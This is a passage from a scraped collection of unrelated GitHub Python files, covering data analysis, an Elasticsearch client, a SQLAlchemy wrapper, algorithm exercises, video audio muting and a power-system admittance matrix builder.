sum(pair.revenue))\n select_tokens.add(pair.token)\n\nprint(\"most revenue average\")\nmost_revenue_average_tokens = sorted(token_list, key=lambda x: sum(x.revenue)/len(x.revenue), reverse=True)\nfor pair in most_revenue_average_tokens[:20:]:\n print(pair.token, pair.count, sum(pair.revenue)/len(pair.revenue))\n select_tokens.add(pair.token)\n\nprint(\"most revenue max\")\nmost_revenue_max_tokens = sorted(token_list, key=lambda x: max(x.revenue), reverse=True)\nfor pair in most_revenue_max_tokens[:20:]:\n print(pair.token, pair.count, max(pair.revenue))\n select_tokens.add(pair.token)\n\nitems = []\nfor token in select_tokens:\n items.append((token, tokens[token].count, sum(tokens[token].revenue), sum(tokens[token].revenue)/len(tokens[token].revenue), max(tokens[token].revenue)))\n\ndf = pd.DataFrame(items, columns=[\"token\", \"txn count\", \"all revenue\", \"average revenue per txn\", \"max revenue in one txn\"])\ndf.sort_values(by=\"txn count\", ascending=False, inplace=True)\ndf.to_html(\"token_distribution.html\", index=False)","repo_name":"pillowsofwind/mev","sub_path":"analysis/token_distribution.py","file_name":"token_distribution.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10656769375","text":"import json\nimport sys\nimport random\nimport matplotlib\n\nresults_folder = \"/home/german/simulation/results\"\n\ndef load_json(filename):\n with open(filename) as f:\n return json.loads(f.read())\n\n\ndef save_json(value, filename):\n with open(filename, 'w') as outfile:\n json.dump(value, outfile)\n\nexperiments = [\"complexity_from_4.31_to_4.66\",\n \"complexity_from_4.66_to_5.0\",\n \"complexity_from_5.0_to_5.35\",\n \"complexity_from_5.35_to_5.69\",\n \"complexity_from_5.69_to_6.03\",\n \"complexity_from_6.03_to_6.38\" ]\n\nplanning_limits = [0, 100, 500, 1000, 5000, 10000, 15000, 20000, 30000, 50000, 100000, 150000, 200000, 300000, 500000]\n\nfor entropy_bucket in range(11):\n selected_worlds = set()\n for experiment in experiments:\n experiment_path = results_folder + \"/\" + experiment\n experiment_stats = load_json( experiment_path + \"/stats.json\")\n for g in experiment_stats[\"groups\"]:\n for w in g[\"worlds\"]:\n eb = round(w[\"stats\"][0][\"entropy\"] * 10)\n if eb == entropy_bucket:\n selected_worlds.update([w[\"name\"]]);\n\n new_settings = []\n for world_name in selected_worlds:\n for experiment in experiments:\n experiment_path = results_folder + \"/\" + experiment\n settings = load_json(experiment_path + \"/settings.json\")\n for setting in settings:\n if setting[\"world\"] == world_name:\n setting[\"group\"] = setting[\"group\"].replace(\"plannint_limit_\", \"\")\n new_settings += [setting]\n\n save_json(new_settings, \"entropy_bucket_\" + str(entropy_bucket) + \".json\")\n","repo_name":"germanespinosa/visualizer","sub_path":"by_entropy.py","file_name":"by_entropy.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27153423091","text":"# COMMON TOPICS\nTOPIC_S_DISCONNECT = \"common.disconnect\"\nTOPIC_D_DISCONNECT_RESPONSE = \"common.disconnect_response\"\nTOPIC_S_CONNECT = \"common.connect\"\nTOPIC_S_CONNECT_ALL = \"common.connect_all\"\nTOPIC_S_LOAD_ALL = \"common.load_all\"\nTOPIC_S_SCAN_FOR_NEW = \"scan.new\"\nTOPIC_D_SCAN_FOR_NEW_RESPONSE = \"scan.new_response\"\nTOPIC_S_ADD_DEVICE = \"add.new\"\nTOPIC_D_ADD_DEVICE_RESPONSE = \"add.new_response\"\n\n# WATER DISPENSER TOPICS\nTOPIC_S_WD_IDENTIFY = \"water_dispenser.identify\"\nTOPIC_S_WD_ON_OFF = \"water_dispenser.on_off\"\nTOPIC_S_WD_RUN = \"water_dispenser.run\"\n\n# SOIL SENSOR TOPICS\nTOPIC_S_SM_CALIBRATE = \"soil_sensor.calibrate\"\nTOPIC_S_SM_SOIL_MEASURE = \"soil_sensor.soil_measure\"\nTOPIC_D_SM_SOIL_MEASURE_RESPONSE = \"soil_sensor.soil_measure_response\"\nTOPIC_S_SM_TIME_INTERVAL = \"soil_sensor.time_interval\"\nTOPIC_S_SM_R_BATTERY = \"soil_sensor.read_battery\"\nTOPIC_D_SM_R_BATTERY_RESPONSE = \"soil_sensor.read_battery_response\"\n\nTOPIC_D_SM_SOIL_MEASURE_ADVERTISEMENT_CONNECTION = \"soil_sensor.soil_measure.connection.advertisement\"\nTOPIC_D_SM_SOIL_MEASURE_ADVERTISEMENT = \"soil_sensor.soil_measure.advertisement\"\n","repo_name":"stefantobiasiewicz/bleConnectV2","sub_path":"topics.py","file_name":"topics.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2054122636","text":"import copy\nimport json\nimport time\nimport hashlib\n\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.client import IndicesClient\nimport elasticsearch.exceptions\n\n# ES 5.x\ntypes = {\n 'int': {'type': 'integer'},\n 'int_NI': {'type': 'integer', 'index': False},\n 'long': {'type': 'long'},\n 'float': {'type': 'float'},\n 'float_NI': {'type': 'float', 'index': False},\n 'keyword': {'type': 'keyword'},\n 'text': {'type': 'text'},\n 'date_yyyyddmm': {'type': 'date', 'format': 'YYYY-MM-dd'},\n 'time_hhmmss': {'type': 'date', 'format': 'HH:mm:ss'},\n 'datetime': {'type': 'date', 'format': 'YYYY-MM-dd HH:mm:ss.SSSSSSZ||YYYY-MM-dd HH:mm:ss.SSSZ||YYYY-MM-dd HH:mm:ssZ||epoch_millis'},\n 'ip': {'type': 'ip'},\n 'geo_point': {'type': 'geo_point'},\n}\n\n\ndef chunk_generator(iterable, chunk_size):\n chunk = []\n for item in iterable:\n chunk.append(item)\n if len(chunk) == chunk_size:\n yield chunk\n chunk = []\n \n if chunk:\n yield chunk\n\n\nclass EsClient:\n def __init__(self, server):\n self.client = Elasticsearch(server)\n self.indices_client = IndicesClient(self.client)\n self.existing_indexes = set()\n \n def delete_index(self, index):\n try:\n self.indices_client.delete(index)\n except:\n pass\n \n def index_exists(self, index):\n if index in self.existing_indexes:\n # I'm assuming the index doesn't get deleted at runtime\n return True\n \n try:\n if self.indices_client.exists(index):\n self.existing_indexes.add(index)\n return True\n except elasticsearch.exceptions.ConnectionError:\n return False\n \n def _create_index_data(self, mappings, shards, replicas, aliases, settings):\n data = {\n 'settings': {\n 'number_of_shards': shards,\n 'number_of_replicas': replicas\n },\n 'mappings': mappings\n }\n \n if aliases:\n data['aliases'] = aliases\n \n if settings:\n data['settings'].update(settings)\n \n return data\n \n def create_index(\n self,\n index,\n mappings,\n shards,\n replicas=0,\n aliases=None,\n settings=None,\n max_n_try=3\n ):\n if self.index_exists(index):\n return 'exists'\n \n data = self._create_index_data(mappings, shards, replicas=replicas, aliases=aliases, settings=settings)\n \n for iter in range(max_n_try + 1):\n try:\n return self.indices_client.create(index=index, body=data)\n except Exception as e:\n if iter < max_n_try:\n # Possibly a race condition with an other process\n time.sleep(2)\n \n if self.index_exists(index):\n return 'exists'\n else:\n raise e\n \n def create_template(\n self,\n name,\n template,\n mappings,\n shards,\n replicas=0,\n aliases=None,\n settings=None\n ):\n if aliases:\n # Not needed yet, Kibana uses wildcards\n raise NotImplementedError\n \n data = self._create_index_data(mappings, shards, replicas=replicas, aliases=aliases, settings=settings)\n data['template'] = template\n \n self.indices_client.put_template(name, body=data)\n \n def count_query(self, index, query, t=1000):\n return self.client.count(index=index, body=query, request_timeout=t)['count']\n \n def get_query(self, index, query, t=1000, scroll=None):\n # \"search\" is faster than \"scroll\" but doesn't perform well on very large result sets (over 100k)\n if scroll == False or (scroll is None and self.count_query(index, query, t) < 90000):\n yield from self.client.search(index=index, body=query, request_timeout=t)['hits']['hits']\n return\n \n query = copy.deepcopy(query)\n query['size'] = 50000\n scroll_result = self.client.search(index=index, body=query, request_timeout=t, scroll='1m')\n n_yield = 0\n \n for doc in scroll_result['hits']['hits']:\n yield doc\n n_yield += 1\n \n if n_yield == scroll_result['hits']['total']:\n # Nothing to scroll\n return\n \n while n_yield < scroll_result['hits']['total']:\n scroll_result = self.client.scroll(body={'scroll': '1m', 'scroll_id': scroll_result['_scroll_id']}, request_timeout=t)\n \n if not scroll_result:\n return\n \n for doc in scroll_result['hits']['hits']:\n yield doc\n n_yield += 1\n \n def refresh(self, index):\n self.client.indices.refresh(index=index)\n \n def exists(self, index, type, id):\n raise NotImplementedError\n \n def upload_documents(\n self, index, type, docs_iterable,\n chunk_size=5000, id_field=None, index_field=None,\n id_from_json=False\n ):\n status = []\n \n fixed_index = isinstance(index, str)\n indexes = set()\n \n if fixed_index:\n indexes.add(index)\n \n for doc_chunk in chunk_generator(docs_iterable, chunk_size):\n data = []\n \n for doc in doc_chunk:\n doc = copy.deepcopy(doc)\n meta = {'_type': type}\n \n if fixed_index:\n meta['_index'] = index\n elif index_field:\n meta['_index'] = doc[index_field]\n del doc[index_field]\n else:\n meta['_index'] = index(doc)\n \n if not fixed_index:\n indexes.add(meta['_index'])\n \n if id_field is not None:\n meta['_id'] = (\n '%d' % int(doc[id_field]) if isinstance(doc[id_field], int) else doc[id_field]\n )\n del doc[id_field]\n js = json.dumps(doc)\n else:\n js = json.dumps(doc)\n \n if id_from_json:\n meta['_id'] = hashlib.sha1(js).hexdigest()\n \n data.append(json.dumps({'index': meta}))\n data.append(js)\n \n data.append('')\n \n status += [i['index']['status'] for i in self.client.bulk(body='\\n'.join(data))['items']]\n \n for index in indexes:\n self.refresh(index)\n \n return status","repo_name":"nikonyrh/docker-scripts","sub_path":"elasticsearch5/esclient.py","file_name":"esclient.py","file_ext":"py","file_size_in_byte":6926,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"44447874347","text":"# 메모리 초과\nfrom itertools import permutations\nimport sys\n\ndef formatting(word):\n result = []\n for i in range(len(word)):\n result.append(word[i])\n return sorted(result)\n\ndef solution(words):\n words = list(map(formatting, words))\n answer = []\n for word in words:\n candidates = list(permutations(word, len(word)))\n for candidate in candidates:\n answer.append(''.join(candidate))\n\n for i in range(len(answer)-1):\n if i == i + 1:\n answer.remove(i)\n print(answer[i])\n\ninput = sys.stdin.readline\nn = int(input())\nwords = [input() for _ in range(n)]\nsolution(words)\n","repo_name":"joohyun333/Algorithm_Study_Group","sub_path":"1주차/애너그램/애너그램_jaehwlee.py","file_name":"애너그램_jaehwlee.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35778835464","text":"\n\"\"\"\nhttps://docs.sqlalchemy.org/en/14/tutorial/index.html#a-note-on-the-future\n\n\"\"\"\n\nimport time\nfrom typing import Optional, Any, Callable\n\nimport pandas as pd\n\nfrom sqlalchemy.orm import sessionmaker, Session\nfrom sqlalchemy import create_engine, text, inspect, Engine, Connection\nfrom sqlalchemy.engine import Inspector\nfrom sqlalchemy.sql.schema import MetaData\nfrom crocodile.core import Struct, Display\nfrom crocodile.file_management import List as L, P, OPLike\n\n_ = create_engine, text\n\n\nDisplay.set_pandas_display()\n\n\nclass DBMS:\n \"\"\"Implementation Philosophy:\n * Always use sqlalchemy API and avoid sql-dielect specific language.\n * Engine is provided externally. It is the end-user's business to make this engine.\n \"\"\"\n def __init__(self, engine: Engine, sch: Optional[str] = None, vws: bool = False):\n self.eng: Engine = engine\n self.con: Optional[Connection] = None\n self.ses: Optional[Session] = None\n self.insp: Optional[Inspector] = None\n self.meta: Optional[MetaData] = None\n self.path = P(self.eng.url.database) if self.eng.url.database else None # memory db\n\n # self.db = db\n self.sch = sch\n self.vws = vws\n self.schema: Optional[L[str]] = None\n # self.tables = None\n # self.views = None\n # self.sch_tab: Optional[Struct] = None\n # self.sch_vws: Optional[Struct] = None\n self.refresh()\n # self.ip_formatter: Optional[Any] = None\n # self.db_specs: Optional[Any] = None\n\n def refresh(self, sch: Optional[str] = None) -> 'DBMS': # fails if multiple schemas are there and None is specified\n self.con = self.eng.connect()\n self.ses = sessionmaker()(bind=self.eng) # ORM style\n self.meta = MetaData()\n self.meta.reflect(bind=self.eng, schema=sch or self.sch)\n insp = inspect(subject=self.eng)\n self.insp = insp\n self.schema = L(obj_list=self.insp.get_schema_names())\n self.sch_tab: dict[str, list[str]] = {k: v for k, v in zip(self.schema.list, self.schema.apply(lambda x: insp.get_table_names(schema=x)))} # dict(zip(self.schema, self.schema.apply(lambda x: self.insp.get_table_names(schema=x)))) #\n self.sch_vws: dict[str, list[str]] = {k: v for k, v in zip(self.schema.list, self.schema.apply(lambda x: insp.get_view_names(schema=x)))}\n return self\n\n def __getstate__(self) -> dict[str, Any]:\n state = self.__dict__.copy()\n del state[\"con\"]\n del state[\"ses\"]\n del state[\"meta\"]\n del state[\"insp\"]\n del state[\"eng\"]\n if self.path:\n state['path'] = self.path.collapseuser()\n return state\n def __setstate__(self, state: dict[str, Any]) -> None:\n self.__dict__.update(state)\n self.eng = self.make_sql_engine(self.path)\n self.refresh()\n\n @classmethod\n def from_local_db(cls, path: OPLike = None, echo: bool = False, share_across_threads: bool = False, **kwargs: Any): return cls(engine=cls.make_sql_engine(path=path, echo=echo, share_across_threads=share_across_threads, **kwargs))\n def __repr__(self): return f\"DataBase @ {self.eng}\"\n def get_columns(self, table: str, sch: Optional[str] = None):\n assert self.meta is not None\n return self.meta.tables[self._get_table_identifier(table=table, sch=sch)].exported_columns.keys()\n def close(self, sleep: int = 2):\n if self.path:\n print(f\"Terminating database `{self.path.as_uri() if 'memory' not in self.path else self.path}`\")\n if self.con: self.con.close()\n if self.ses: self.ses.close()\n self.eng.pool.dispose()\n self.eng.dispose()\n time.sleep(sleep)\n def _get_table_identifier(self, table: str, sch: Optional[str]):\n if sch is None: sch = self.sch\n if sch is not None:\n return sch + \".\" + table\n else: return table\n\n @staticmethod\n def make_sql_engine(path: OPLike = None, echo: bool = False, dialect: str = \"sqlite\", driver: str = [\"pysqlite\", \"DBAPI\"][0], pool_size: int = 5, share_across_threads: bool = True, **kwargs: Any):\n \"\"\"Establish lazy initialization with database\"\"\"\n if str(path) == \"memory\":\n print(\"Linking to in-memory database.\")\n if share_across_threads:\n from sqlalchemy.pool import StaticPool # see: https://docs.sqlalchemy.org/en/14/dialects/sqlite.html#using-a-memory-database-in-multiple-threads\n return create_engine(url=f\"{dialect}+{driver}:///:memory:\", echo=echo, future=True, poolclass=StaticPool, connect_args={\"check_same_thread\": False})\n else: return create_engine(url=f\"{dialect}+{driver}:///:memory:\", echo=echo, future=True, pool_size=pool_size, **kwargs)\n path = P.tmpfile(folder=\"tmp_dbs\", suffix=\".db\") if path is None else P(path).expanduser().absolute().create(parents_only=True)\n print(f\"Linking to database at {path.as_uri()}\")\n return create_engine(url=f\"{dialect}+{driver}:///{path}\", echo=echo, future=True, pool_size=10, **kwargs) # echo flag is just a short for the more formal way of logging sql commands.\n\n # ==================== QUERIES =====================================\n def execute_as_you_go(self, *commands: str, res_func: Callable[[Any], Any] = lambda x: x.all(), df: bool = False):\n with self.eng.connect() as conn:\n result = None\n for command in commands:\n result = conn.execute(text(command))\n conn.commit() # if driver is sqlite3, the connection is autocommitting. # this commit is only needed in case of DBAPI driver.\n return res_func(result) if not df else pd.DataFrame(res_func(result))\n\n def execute_begin_once(self, command: str, res_func: Callable[[Any], Any] = lambda x: x.all(), df: bool = False):\n with self.eng.begin() as conn:\n result = conn.execute(text(command)) # no need for commit regardless of driver\n result = res_func(result)\n return result if not df else pd.DataFrame(result)\n\n def execute(self, command: str, df: bool = False):\n with self.eng.begin() as conn: result = conn.execute(text(command))\n return result if not df else pd.DataFrame(result)\n\n # def execute_script(self, command: str, df: bool = False):\n # with self.eng.begin() as conn: result = conn.executescript(text(command))\n # return result if not df else pd.DataFrame(result)\n\n # ========================== TABLES =====================================\n def read_table(self, table: str, sch: Optional[str] = None, size: int = 100):\n if self.con:\n res = self.con.execute(text(f'''SELECT * FROM \"{self._get_table_identifier(table, sch)}\"'''))\n return pd.DataFrame(res.fetchmany(size))\n\n def insert_dicts(self, table: str, *mydicts: dict[str, Any]):\n cmd = f\"\"\"INSERT INTO {table} VALUES \"\"\"\n for mydict in mydicts: cmd += f\"\"\"({tuple(mydict)}), \"\"\"\n self.execute_begin_once(cmd)\n\n def describe_table(self, table: str, sch: Optional[str] = None, dtype: bool = True):\n print(table.center(100, \"=\"))\n self.refresh()\n assert self.meta is not None\n tbl = self.meta.tables[table]\n assert self.ses is not None\n count = self.ses.query(tbl).count()\n res = Struct(name=table, count=count, size_mb=count * len(tbl.exported_columns) * 10 / 1e6)\n res.print(dtype=False, as_config=True)\n dat = self.read_table(table=table, sch=sch, size=2)\n cols = self.get_columns(table, sch=sch)\n df = pd.DataFrame.from_records(dat, columns=cols)\n print(\"SAMPLE:\\n\", df)\n assert self.insp is not None\n if dtype: print(\"\\nDETAILED COLUMNS:\\n\", pd.DataFrame(self.insp.get_columns(table)))\n print(\"\\n\" * 3)\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"thisismygitrepo/crocodile","sub_path":"myresources/crocodile/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":7863,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"13507036951","text":"# -*- coding: utf-8 -*-\n\"\"\"\nGiven n non-negative integers representing an elevation map where the width of each bar is 1, \ncompute how much water it can trap after raining.\n\nThere is a graphic illustration on the website of Leetcode: https://leetcode.com/problems/trapping-rain-water/\n\nIdea: \n first calculate the intervals (indexes of left and right column) that contain water\n for each interval, calculate how much water is trapped\n sum up all the waters\n\"\"\"\n\n\ndef calculate_trapped_water(h):\n water_intervals = []\n i = 0\n while i < len(h):\n current_interval = find_next_water_interval(h, i)\n water_intervals.append(current_interval)\n i = current_interval[1]\n water_intervals.pop()\n\n water = 0\n for water_interval in water_intervals:\n water += calculate_interval_water(h, water_interval)\n return water\n \n\ndef find_next_water_interval(h, i):\n j = i\n if j+1 < len(h):\n while h[j] <= h[j+1] or max(h[j+1:]) < h[j]:\n j += 1\n if j >= len(h)-1:\n break\n start_idx = j\n \n j += 1\n if j >= len(h)-1:\n return [len(h), len(h)]\n \n while h[j] < h[start_idx]:\n j += 1\n if j >= len(h)-1:\n break\n \n if j > len(h)-1:\n return [len(h), len(h)] \n return [start_idx, j]\n\ndef calculate_interval_water(h, water_interval):\n min_column_height = min(h[water_interval[0]], h[water_interval[1]])\n \n water_accumulated = 0\n for i in range(water_interval[0]+1, water_interval[1]):\n water_accumulated = water_accumulated + min_column_height - h[i]\n return water_accumulated\n \n \n \nprint(calculate_trapped_water([4,2,0,3,2,5]))\nprint()\nprint(calculate_trapped_water([0,1,0,2,1,0,1,3,2,1,2,1]))\n\n \n \n \n \n","repo_name":"LuckerZOfficiaL/Coding-Problems","sub_path":"trapping_rain_water.py","file_name":"trapping_rain_water.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4020590488","text":"from PIL import Image\nimport torch\nfrom image_colorization_api.image_colorization.utils import PIL_image_to_model_input, lab_to_rgb\nfrom image_colorization_api import app\n\ndef make_prediction(datastream):\n '''\n reads image data stream\n resizes image to model input size (256)\n converts to L*a*b* color space\n gets L features\n feeds L input features to colorization model to predict ab features\n reconstructs Lab image from L and ab features\n converts to RGB color space\n returns colorized image\n '''\n \n img = Image.open(datastream)\n data = PIL_image_to_model_input(img)\n \n app.model.net_G.eval()\n with torch.no_grad():\n app.model.setup_input(data)\n app.model.forward()\n \n ab = app.model.fake_color.detach()\n img = lab_to_rgb(data['L'], ab.cpu())\n img = img.squeeze(0)\n return img","repo_name":"daptecc/image_colorization_api","sub_path":"image_colorization_api/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2291251516","text":"import os\nimport pandas as pd\nfrom moviepy.editor import *\nimport librosa\nimport soundfile as sf\nimport shutil\nimport ffmpeg\nimport subprocess as sp\nfrom env_list import DATA_OUT_PATH, DATA_IN_PATH, PATH_DATA\n\n# 경로 정의\nINPUT_DATA = 'clova_result.csv'\n\ntest_data = pd.read_csv(PATH_DATA + 'clova_result.csv', header=0)\npred_df = pd.DataFrame({'sentence': test_data['sentence'], 'start': test_data['start'], 'end': test_data['end'],\n 'predict': test_data['results']})\n\nstart = []\nend = []\nresult = []\n\nfor i in range(len(pred_df)):\n start.append(int(pred_df['start'][i] * 44.1))\n end.append(int(pred_df['end'][i] * 44.1))\n\n if pred_df['predict'][i] >= 0.7:\n result.append(1)\n else:\n result.append(0)\n\n\ndef make_quiet_wav(wav, result, start, end, output_name):\n quiet, _ = librosa.load(DATA_IN_PATH + 'quiet.wav', sr=44100) # 무음 파일 로드\n data, _ = librosa.load(wav, sr=44100) # 변환할 음성 파일 로드\n # data -> samplerate로 나누면 초(s) 단위\n\n length = len(result) # 단위 개수\n lenq = len(quiet) # 694575\n\n for i in range(0, length):\n tmp = int(end[i] - start[i])\n r = result[i]\n print(\"for문 : [{}] {} : {}\".format(r, start[i] / 44100, end[i] / 44100))\n if (r == 1):\n if tmp > lenq:\n data[end[i] - lenq:end[i]] = quiet[:]\n print(\"quiet : {}:{}\".format((end[i] - lenq) / 44100, end[i] / 44100))\n else:\n data[start[i]:end[i]] = quiet[:tmp] * 1.0\n print(\"quiet : {}:{}\".format(start[i] / 44100, end[i] / 44100))\n sf.write(output_name, data, 44100)\n\n\ndef main():\n global targetloc\n global targetname\n if len(sys.argv) < 4:\n targetloc = sys.argv[1]\n targetname = sys.argv[2]\n\n targetname = targetname[:-4]\n print(targetname)\n video = targetloc\n\n data_output = DATA_OUT_PATH\n print('\\nplease wait! \\n')\n\n # 파일 복사하기 (사본 생성)\n shutil.copy2(video, data_output + \"copied_\" + targetname + \".mp4\")\n print('\\nMake copy of video ! \\n')\n\n videoclip = VideoFileClip(data_output + \"copied_\" + targetname + \".mp4\")\n audioclip = videoclip.audio\n audioclip.write_audiofile(data_output + \"copy.wav\") # 음성 wav 추출하기\n print('\\nChage mp4 to wav ! \\n')\n\n make_quiet_wav(data_output + \"copy.wav\", result, start, end, data_output + \"result_{}.wav\".format(targetname))\n\n video = ffmpeg.input(data_output + \"copied_\" + targetname + \".mp4\").video\n audio = ffmpeg.input(data_output + \"result_{}.wav\".format(targetname)).audio\n r = ffmpeg.output(video, audio, data_output + \"result_{}.mp4\".format(targetname),\n vcodec='copy', acodec='aac', strict='experimental')\n ffmpeg.run(r)\n\n print('\\nNow you can check!!! ')\n\n\nif __name__ == '__main__':\n data_output = DATA_OUT_PATH\n try:\n if not os.path.exists(data_output):\n os.makedirs(data_output)\n except OSError:\n print('Error: Creating directory. ')\n quit()\n\n main()\n print('\\nDone !!! \\n')\n","repo_name":"Han-YouLim/pbl5-Han-YouLim","sub_path":"pythonDir/makeVideo.py","file_name":"makeVideo.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33725510041","text":"from time import sleep, perf_counter\nimport numpy\n\ndef solution():\n\n inputFile = open('input','r')\n # inputFile = open('inputTest','r')\n\n inputStringList = inputFile.readlines()\n\n inputFile.close()\n\n numRows=len(inputStringList)\n\n caveArray = numpy.empty([numRows,2], dtype=object)\n\n for i in range(0, numRows):\n caveArray[i,:] = inputStringList[i].replace('\\n','').split('-')\n\n #Organize information into list of all caves\n # and lists of all their connections\n\n listOfCaves = []\n listOfConnections = []\n\n for i in range(0, numRows):\n\n if not caveArray[i,0] in listOfCaves:\n listOfCaves.append(caveArray[i,0])\n listOfConnections.append([caveArray[i,1]])\n else:\n listOfConnections[listOfCaves.index(caveArray[i,0])].append(caveArray[i, 1])\n if not caveArray[i,1] in listOfCaves:\n listOfCaves.append(caveArray[i,1])\n listOfConnections.append([caveArray[i,0]])\n else:\n listOfConnections[listOfCaves.index(caveArray[i,1])].append(caveArray[i, 0])\n\n listOfPaths = [['start']]\n isPathDone = [False]\n\n while False in isPathDone:\n for i in range(0, len(listOfPaths)):\n if not isPathDone[i]:\n newBranch = False\n\n for connection in listOfConnections[listOfCaves.index(listOfPaths[i][-1])]:\n if connection.isupper() or not connection in listOfPaths[i]:\n if not newBranch:\n newBranch = True\n listOfPaths[i].append(connection)\n if connection == 'end':\n isPathDone[i] = True\n else:\n listOfPaths.append(listOfPaths[i].copy())\n listOfPaths[-1][-1]=connection\n isPathDone.append(False)\n if connection == 'end':\n isPathDone[-1] = True\n if not newBranch:\n isPathDone[i] = True\n\n listOfCompletePaths = []\n\n for path in listOfPaths:\n if path[-1] == 'end':\n listOfCompletePaths.append(path)\n\n print(\"There are \", len(listOfCompletePaths), \"paths out of the caves.\")\n\n\nstart = perf_counter()\nsolution()\nend = perf_counter()\nexecution_time = (end - start)\nprint(execution_time)","repo_name":"JeremiahSchroeder/AdventOfCode2021","sub_path":"Day12/Day12.py","file_name":"Day12.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73150747628","text":"import sys\nimport tkinter\nfrom tkinter import filedialog as fd\nimport sympy as sp\nimport numpy as np\nimport pandas as pd\nnp.set_printoptions(threshold=sys.maxsize)\n\ndef open_file():\n \"\"\"\n Opens a specified .xlsx file through a dialog box.\n\n Returns\n -------\n str\n A string containing the filepath for the selected file.\n \"\"\"\n tkinter.Tk().withdraw()\n filepath = fd.askopenfilename(title=\"Select a file\",\n filetypes=[(\"Excel files\", \"*.xlsx\")])\n print(f\"La ruta del archivo seleccionado es: {filepath}\")\n return filepath\n\ndef parse_to_dataframe(excel_file):\n \"\"\"\n Parses an excel file into several dataframes to extract contents related to\n buses, lines, transformers, loads and generators for power systems.\n\n Parameters\n ----------\n excel_file : str\n Contents of a .xlsx file with information related to power flow cases.\n\n Returns\n -------\n Array of DataFrames\n An array containing a set of DataFrames taken from the spreadsheet.\n \"\"\"\n data = pd.ExcelFile(excel_file)\n contents = ['Basis', 'Buses', 'Lines', 'Transformers',\n 'Loads', 'Capacitors', 'Generators']\n vector = []\n for item, position in enumerate(contents):\n try:\n vector.append(data.parse(contents[item]))\n except ValueError:\n print(f\"ValueError: Expected DataFrame {contents[item]} not found\")\n sys.exit()\n return vector\n\ndef generate_matrices(vector):\n \"\"\"\n Converts an array of DataFrames into individual matrices.\n\n Parameters\n ----------\n vector: array\n Contains a set of DataFrames that will be converted to matrices.\n\n Returns\n -------\n matrices\n Matrices for each of the DataFrames contained in vector.\n \"\"\"\n matrices = []\n for index, position in enumerate(vector):\n matrices.append(vector[index].values)\n return matrices\n\ndef add_lines_items_to_matrix(matrix, system):\n \"\"\"\n Returns the matrix with modified values based on lines data from the power\n system.\n\n Parameters\n ----------\n matrix: matrix\n Matrix to be filled with line impedance values.\n data: array\n Array that contains information about the lines admittances.\n\n Returns\n -------\n matrix\n Matrix with modified impedance entries.\n \"\"\"\n lines_data = system['lines']\n buses_data = system['buses']\n for index, position in enumerate(lines_data):\n bus_1 = int(lines_data[index][0])\n bus_2 = int(lines_data[index][1])\n impedance = complex(lines_data[index][2],lines_data[index][3])\n susceptance = complex(0,lines_data[index][4])\n admittance = 1/impedance + susceptance/2\n matrix[bus_1-1][bus_2-1] -= admittance\n matrix[bus_2-1][bus_1-1] -= admittance\n matrix[bus_1-1][bus_1-1] += admittance\n matrix[bus_2-1][bus_2-1] += admittance\n return matrix\n\ndef add_transformers_items_to_matrix(matrix, data):\n \"\"\"\n Returns the matrix with modified values based on transformers data from the\n power system.\n\n Parameters\n ----------\n matrix: matrix\n Matrix to be filled with tolerance impedance values.\n data: array\n Array that contains information about the transformers admittances.\n\n Returns\n -------\n matrix\n Matrix with modified impedance entries.\n \"\"\"\n for index, position in enumerate(data):\n bus_1 = int(data[index][0])\n bus_2 = int(data[index][1])\n impedance = complex(data[index][2],data[index][3])\n admittance_cc = 1/impedance\n bus_tap = data[index][5]\n parameter_A = admittance_cc/bus_tap\n parameter_B = admittance_cc/bus_tap*(1/bus_tap-1)\n parameter_C = admittance_cc*(bus_tap-1)/bus_tap\n admittance = parameter_A + (parameter_B + parameter_C)/2\n matrix[bus_1-1][bus_2-1] = matrix[bus_1-1][bus_2-1] + admittance\n matrix[bus_2-1][bus_1-1] = matrix[bus_2-1][bus_1-1] + admittance\n return matrix\n\ndef admittance_matrix(system):\n \"\"\"\n Returns the admittance matrix for a power system.\n\n Parameters\n ----------\n power_system: dict\n Dictionary containing data necessary to determine the admittance matrix for\n a power syste.\n\n Returns\n -------\n matrix\n The admittance matrix for the specified power system\n \"\"\"\n buses = system['buses']\n transformers = system['transformers']\n matrix = np.zeros(shape=(len(buses), len(buses)), dtype=np.complex_)\n matrix = add_lines_items_to_matrix(matrix, power_system)\n matrix = add_transformers_items_to_matrix(matrix, transformers)\n return matrix\n\ndef initial_vector():\n \"\"\"\n Returns a vector for voltages and angles of a power system for a Newton Raphson\n iteration.\n\n Parameters\n ----------\n s\n \"\"\"\n return\n\ndef generic_functions():\n Vk, Vi, Gki, Bki, theta_ki = sp.symbols('Vk, Vi, Gki, Bki, theta_ki')\n active_power_function = Vk*Vi*(Gki*sp.cos(theta_ki)+Bki*sp.sin(theta_ki))\n reactive_power_function = Vk*Vi*(Gki*sp.sin(theta_ki)-Bki*sp.cos(theta_ki))\n partial_derivative_p_theta = sp.Derivative(active_power_function,theta_ki).doit()\n partial_derivative_p_v = sp.Derivative(active_power_function,Vk).doit()\n print(active_power_function, '\\n', reactive_power_function, '\\n', 